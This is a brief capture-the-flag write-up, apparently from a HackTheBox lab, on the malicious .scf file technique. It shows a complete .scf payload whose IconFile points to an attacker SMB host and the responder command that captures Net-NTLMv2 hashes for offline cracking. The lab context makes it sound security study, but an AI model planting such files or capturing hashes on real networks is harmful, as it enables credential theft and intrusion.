Skip to content

0xdf.scf

A classic attack when you have write access to a file share is to drop a .scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the .scf file is opened with File Explorer, the .scf will inspire Explorer to connect back to get that icon file, and offer Net-NTLMv2 auth negotiation. If I control that host, and I can capture that exchange and try to crack the Net-NTLMv2 using an offline bruteforce (like hashcat). I used this technique on the Insane machine Sizzle back in 2019.

SCF files are Windows Shell Command files, and there are way more references on how to make a malicious one than legit uses. Some old Microsoft pages (that no longer exist, but are on the Wayback Machine) show how to create a Show Desktop Shortcut and a View Channels Quick Launch using SCF files. The format is:

[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>

Capture Hash

I’ll abuse the IconFile bit, but having it point to my server over SMB, and create 0xdf.scf:

[Shell]    
Command=2    
IconFile=\\10.10.14.16\evil.exe,3

I’ll start responder, which will start many different kinds of server (including SMB) to listen and try to get Net-NTLMv2 challenges.

sudo responder -I tun0 -v

Ref

https://0xdf.gitlab.io/2022/02/26/htb-driver.html